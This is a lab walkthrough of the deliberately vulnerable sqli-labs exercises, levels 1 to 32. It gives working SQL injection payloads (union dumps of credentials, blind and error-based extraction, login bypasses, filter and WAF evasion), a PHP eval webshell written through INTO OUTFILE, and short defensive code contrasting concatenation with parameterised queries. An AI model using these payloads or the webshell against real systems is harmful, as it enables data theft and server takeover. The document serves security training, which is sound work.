sqli-labs walkthrough notes

Reference:

MYSQL注入天书

This write-up uses manual injection wherever possible to deepen understanding of the underlying principles, and deliberately avoids sqlmap, scripted injection and other automated methods.

Page-1 (Basic Challenges)

Less-1 GET - Error based - Single quotes - String (error-based GET single-quote string injection)

Manual injection

On entering, the page asks for an id; any number given as the id is echoed back normally, so we try injecting:

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1'

1_1.png

From the error message we guess that the original statement wraps the input as '$id', so a single quote ' closes it.

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' or 1=1--+

1_2.png

Normal output, so use order by to find the column count: there are 3 columns (4 produces an error).

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' order by 4--+

Then dump the database names:

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

1_3.png

We find the security database; next dump its table names:

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

1_4.png

Column names of the users table:

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

1_5.png

Dump all data in the table:

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,2,group_concat(username,0x3a,password) from users--+

1_6.png

Nice, we have finally achieved the same result as repeatedly typing ?id=xxxxx by hand, haha 😄

Source analysis

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

The incoming $id is concatenated straight into the SQL string, so the injection only needs ' to close the preceding quote and --+ to comment out the rest of the statement.
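The concatenation bug and its fix side by side, as an added example that is not part of the original write-up or of sqli-labs: it rebuilds the Less-1 query over an in-memory SQLite table (an assumption, standing in for MySQL; the splice-the-parameter-into-SQL mistake behaves the same in both) and contrasts it with a bound parameter, using the union payload shape from this level.

```python
import sqlite3

# Constructed stand-in for the sqli-labs `users` table (sample rows, not real data).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# Same shape as the Less-1 dump payload, minus URL encoding (`--+` becomes `-- `).
UNION_PAYLOAD = "-1' union select 1,2,'x'-- "


def make_db() -> sqlite3.Connection:
    """Create the in-memory table the two query styles are run against."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def query_concat(con: sqlite3.Connection, user_id: str) -> list:
    """The Less-1 pattern: the raw request parameter is spliced into the SQL text,
    so a quote in the parameter ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return con.execute(sql).fetchall()


def query_param(con: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value is bound as a parameter and is only ever data;
    a quote or comment marker inside it cannot change the statement."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (user_id,)).fetchall()


def compare(user_id: str) -> dict:
    """Run both styles on the same input so the difference is visible."""
    con = make_db()
    return {"concat": query_concat(con, user_id), "param": query_param(con, user_id)}


if __name__ == "__main__":
    print(compare("1"))             # both: [(1, 'Dumb', 'Dumb')]
    print(compare(UNION_PAYLOAD))   # concat: attacker-chosen row; param: []
```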

Less-2 GET - Error based - Intiger based (error-based GET integer injection)

Manual injection

Enter ?id=1' and look at the error:

2.png

From the error we guess that $id is not wrapped in '' but concatenated directly, so compared with Less-1 we only need to drop the ' after the number.

#probe
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 or 1=1--+
#column count
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 4--+
#database names
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#table names
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#column names
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#data
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users--+

Source analysis

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$id is concatenated in directly, with no quoting at all.

Less-3 GET - Error based - Single quotes with twist string (error-based GET single-quote twisted string injection)

Manual injection

Enter ?id=1' and look at the error:

3.png

From the error we guess the original statement is ('$id'), so ') closes it.

#probe
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')--+
#column count
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 4--+
#database names
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#table names
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#column names
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#data
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,2,group_concat(username,0x3a,password) from users--+

Source analysis

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less-4 GET - Error based - Double Quotes - String (error-based GET double-quote string injection)

Manual injection

Entering ?id=1' again displays normally this time, so try ?id=1" instead:

4.png

From the error we guess the original statement is ("$id"), so ") closes it.

#probe
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")--+
#column count
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 4--+
#database names
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#table names
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#column names
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#data
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,2,group_concat(username,0x3a,password) from users--+

Source analysis

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

Less-5 GET - Double Injection - Single Quotes - String (double-query GET single-quote string injection)

Source analysis

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color="#FFFF00">';
print_r(mysqli_error($con1));
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

As in Less-1, the input is wrapped in '' and concatenated. The difference is that a correct input no longer displays any database data, while error messages are still echoed back. Several injection methods are used on this level, so that passing it doubles as a tour of the different injection techniques and function tricks.

Boolean-based blind injection

Using left() and length() to obtain the version and the database name

Compare the string character by character: if the guess is correct, You are in........... is displayed, otherwise it is not.

#version; my database version is 10.4.11-MariaDB
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),1)=1--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),2)=10--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),15)='10.4.11-MariaDB'--+
#database name length
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and length(database())=8--+
#database name; the database is security. First check whether the first character is greater than a, then work through it position by position
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),1)>'a'--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),8)='security'--+

Using substr() and ascii() to obtain table names

Compare position by position: if the guess is correct, You are in........... is displayed, otherwise it is not.

#table names; the first table here is emails, the database is security
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+

#after the first character, brute-force the remaining characters one by one to obtain the first table name; to get the second table, just change the value after limit
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+

Using regexp to obtain column names

Regular-expression match: if it matches, You are in........... is displayed, otherwise it is not.

#check whether users has a column name starting with us
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
#check whether users has a column name starting with pass
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass[a-z]' limit 0,1)--+

Using ord() and mid() to obtain the contents of the users table

#the first username is Dumb; this statement checks whether the first character of the first username is D
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

Error-based injection

How to fix MySQL ERROR 1267 (HY000)

Error-based injection using floor(rand(0)*2)
http://127.0.0.1:8081/sqli-labs/Less-5/?id=-1'union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns  group by a--+

5_1.png

Error-based injection via a double value out of range
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select (exp(~(select * FROM(SELECT USER())a))),2,3--+
Error-based injection via bigint overflow
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+
Error-based injection via the xpath functions
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+

5_2.png

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+

5_3.png

Using duplicate column names
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x--+

5_4.png

Time-based injection
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+

Less-6 GET - Double Injection - Double Quotes - String (double-query GET double-quote string injection)

Manual injection

Error-based injection reveals the version information.

http://127.0.0.1:8081/sqli-labs/Less-6/?id=1"and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+--+

Source analysis

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

$id is wrapped in "", and the normal query output is not displayed.

Less-7 GET - Dump into outfile - String (GET string injection dumping into a file)

Source analysis

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

The input is wrapped in (('')).

Manual injection

#test whether injection is possible
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1')) or 1=1--+
#write user,2,3 into the file uuu.txt
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT user(),2,3 into outfile "txt文件路径"--+
#write a one-line PHP webshell into a file
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT '<?php @eval($_POST["attack"])?>',2,3 into outfile "php文件路径"--+

Less-8 GET - Blind - Boolian Based - Single Quotes (boolean-based GET single-quote blind injection)

Manual injection

#test the injection point
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1'or 1=1--+
#boolean blind
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1' and left(version(),15)='10.4.11-MariaDB'--+

Source analysis

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysqli_error($con1));
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

On this level the error message is no longer echoed either, but boolean blind injection still works by checking whether You are in........... appears.

Less-9 GET - Blind - Time based. - Single Quotes (time-based GET single-quote blind injection)

Manual injection

#time-based blind
#guessing the database name security
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

Source analysis

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysqli_error($con1));
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

Less-10 GET - Blind - Time based - double quotes (time-based double-quote blind injection)

The input is wrapped in ""; everything else is the same as Less-9.

Less-11 POST - Error Based - Single quotes- String (error-based POST single-quote string injection)

Manual injection

Parameters are received via POST.

#universal password; the password field can be anything
admin'or 1=1#
#database name; the password field can be anything
1admin'union select 1,database()#

Source analysis

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-12 POST - Error Based - Double quotes- String-with twist (error-based POST double-quote twisted string injection)

Manual injection

#POST body
uname=1")or 1=1#&passwd=2

Source analysis

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-13 POST - Double Injection - Single quotes- String -twist (POST single-quote twisted double-query injection)

Manual injection

First log in with the universal password.

uname=1')or 1=1#&passwd=2

13.png

Once logged in, boolean blind injection can be used to dump the database name and other information.

Source analysis

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

Less-14 POST - Double Injection - Single quotes- String -twist (POST single-quote twisted double-query injection)

Manual injection

#universal password
admin"or 1=1#
#error-based injection
uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit

14.png

Source analysis

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

less-15 POST - Blind- Boolian/time Based - Single quotes (boolean/time-based POST single-quote blind injection)

Manual injection

Use time-based injection: if the guess is correct the login succeeds immediately, otherwise the response is delayed by 5 s.

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

Source analysis

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-16 POST - Blind- Boolian/Time Based - Double quotes (boolean/time-based POST double-quote blind injection)

Manual injection

Use time-based injection: if the guess is correct the login succeeds immediately, otherwise the response is delayed by 5 s.

uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

Source analysis

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-17 POST - Update Query- Error Based - String (error-based POST injection in an update query)

Manual injection

#error-based injection
uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit
#time-based injection
uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit

Source analysis

function check_input($con1, $value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysqli_real_escape_string($con1, $value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}

$uname=check_input($con1, $_POST['uname']);
$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

In Less-17, check_input() applies escaping to username, so username cannot be used as the injection point here; passwd is used unescaped.

Function notes

addslashes() #returns the string with a backslash added before the predefined characters: single quote ('), double quote ("), backslash (\) and NUL.
stripslashes() #removes the backslashes added by addslashes().
mysql_real_escape_string() #escapes the special characters in a string for use in a SQL statement: \x00, \n, \r, \, ', ", \x1a.

Less-18 POST - Header Injection - Uagent field - Error based (error-based POST header injection via User-Agent)

Manual injection

Modify the User-Agent header with an intercepting proxy:

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

18_2.png

Source analysis

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

uname and passwd are processed by check_input(), so injecting through uname and passwd does not work, but the insert statement can be used.

Less-19 POST - Header Injection - Referer field - Error based (error-based POST header injection via Referer)

Manual injection

Modify the Referer header:

'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1

Source analysis

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);

$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

Less-20 POST - Cookie injections - Uagent field - Error based (error-based POST cookie header injection)

Manual injection

Add the cookie:

uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

20.png

Source analysis

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

setcookie('uname', $cookee, time()+3600);

Less-21

Manual injection

The cookie value just needs to be base64-encoded.

Cookie:
uname=YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

Source analysis

function check_input($con1, $value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = '"' . mysqli_real_escape_string($con1, $value) . '"'; //wraps the value in "
}
else
{
$value = intval($value);
}
return $value;
}

setcookie('uname', base64_encode($row1['username']), time()+3600);

Less-22

Manual injection

As in Less-21, the cookie value needs to be base64-encoded.

Source analysis

function check_input($con1, $value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysqli_real_escape_string($con1, $value) . "'"; //wraps the value in '
}
else
{
$value = intval($value);
}
return $value;
}

setcookie('uname', base64_encode($row1['username']), time()+3600);

Page-2 (Advanced Injections)

Less-23 GET - Error based - strip comments (error-based GET injection with comments filtered)

Manual injection

#get the install path
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,@@basedir,'3
#get the database names
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
#get all table names in security
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
#get all column names in users
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3
#get the contents of the username column of users
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3
#get the contents of the password column of users
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(password) from security.users limit 0,1),'3

#error-based injection to get the database name
http://127.0.0.1:8081/sqli-labs/Less-23/?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

Source analysis

$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

The two comment markers # and -- are filtered out, so the payload closes the trailing quote with '3 instead of commenting it away.

Less-24 Second Degree Injections Real treat - Store Injections (second-order injection)

Manual injection

Register an account with the username admin'#

24_1.png

After registration the record is visible in the backend:

24_2.png

Log in with the newly registered account and change its password; this changes the password of admin.

24_3.png

Source analysis

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

Less-25 Trick with OR & AND (or and and filtered)

Bypassing the or/and filter

(1) Case variation: Or, OR, oR

(2) Encoding: hex, urlencode

(3) Inline comments: /*or*/

(4) Operator symbols: and = &&, or = ||

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'||1=1--+ 
http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'OOrr 1=1--+

Source analysis

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)

return $id;
}
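Why a single-pass keyword blacklist is not a fix, as an added example that is not part of the original write-up or of sqli-labs: a Python port of the Less-25 blacklist() above shows that the double-written OOrr already used on this level survives one pass and that the filter also mangles legitimate input, while an allowlist on the expected shape of id (an assumption: the level only ever needs an integer) rejects every variant without needing a keyword list.

```python
import re
from typing import Optional


def blacklist(id_param: str) -> str:
    """Python port of the Less-25 blacklist(): one case-insensitive pass each
    for 'or' and 'and', with no recursion, exactly like the PHP preg_replace."""
    id_param = re.sub(r"or", "", id_param, flags=re.IGNORECASE)
    id_param = re.sub(r"and", "", id_param, flags=re.IGNORECASE)
    return id_param


def parse_id(raw: str) -> Optional[int]:
    """Allowlist alternative: accept only a short decimal integer and hand back
    a typed value, so the query can be built with a bound parameter.
    Returns None for anything else (quotes, operators, keywords, whitespace)."""
    if re.fullmatch(r"[0-9]{1,10}", raw) is None:
        return None
    return int(raw)


def filter_report(raw: str) -> dict:
    """Show side by side what the blacklist leaves behind and what the
    allowlist decides, for the same raw request parameter."""
    return {"after_blacklist": blacklist(raw), "allowlisted": parse_id(raw)}


if __name__ == "__main__":
    # Inputs constructed from the payloads shown on this level.
    for sample in ("1", "1'OOrr 1=1--+", "1'||1=1--+", "password"):
        print(repr(sample), "->", filter_report(sample))
```

Note the last sample: a user whose legitimate input merely contains the letters "or" has it silently corrupted, which is the usual collateral damage of keyword stripping.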

Less-25a Trick with OR & AND Blind (blind injection with or and and filtered)

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-25a/?id=-1 UNION select 1,@@basedir,3#

Less-26 Trick with comments and space (injection with comments and spaces filtered)

Manual injection

URL-encoded whitespace substitutes can be used to bypass the space filter (these may not work on Windows):

%09 horizontal tab
%0a line feed
%0c form feed
%0d carriage return
%0b vertical tab
%a0 space

http://127.0.0.1:8081/sqli-labs/Less-26/?id=1'anandd(updatexml(1,concat(0x7e,(select @@version),0x7e),1));%00

Source analysis

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}

less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us (blind injection with spaces and comments filtered)

Manual injection

Error-based injection is not possible; use blind injection directly.

Source analysis

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}

less 27 GET - Error Based- All your UNION & SELECT belong to us (union and select filtered)

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-27/?id=1'and(uPdatexml(1,conCat(0x7e,(selEct @@version),0x7e),1));%00

Source analysis

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}

less 27a GET - Blind Based- All your UNION & SELECT belong to us

Manual injection

Error-based injection is not possible; use blind injection directly.

Source analysis

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}

less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis (error-based, parenthesised single-quote string, with union and select etc. filtered)

Manual injection

Double-writing the keywords bypasses the filter.

Source analysis

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}

less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis (blind, parenthesised single-quote string, with union and select etc. filtered)

Manual injection

Double-writing the keywords bypasses the filter.

Source analysis

function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.
return $id;
}

Less-29 An error based on a WAF

Manual injection

Note that the Tomcat environment has to be configured for this level.

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1'union select 1,database(),3--+

Less-30 Get-Blind Havaing with WAF

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1"union select 1,database(),3--+

Less-31 Protection with WAF

Manual injection

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1")union select 1,database(),3--+

Less-32 Bypass addslashes()

Wide-byte injection

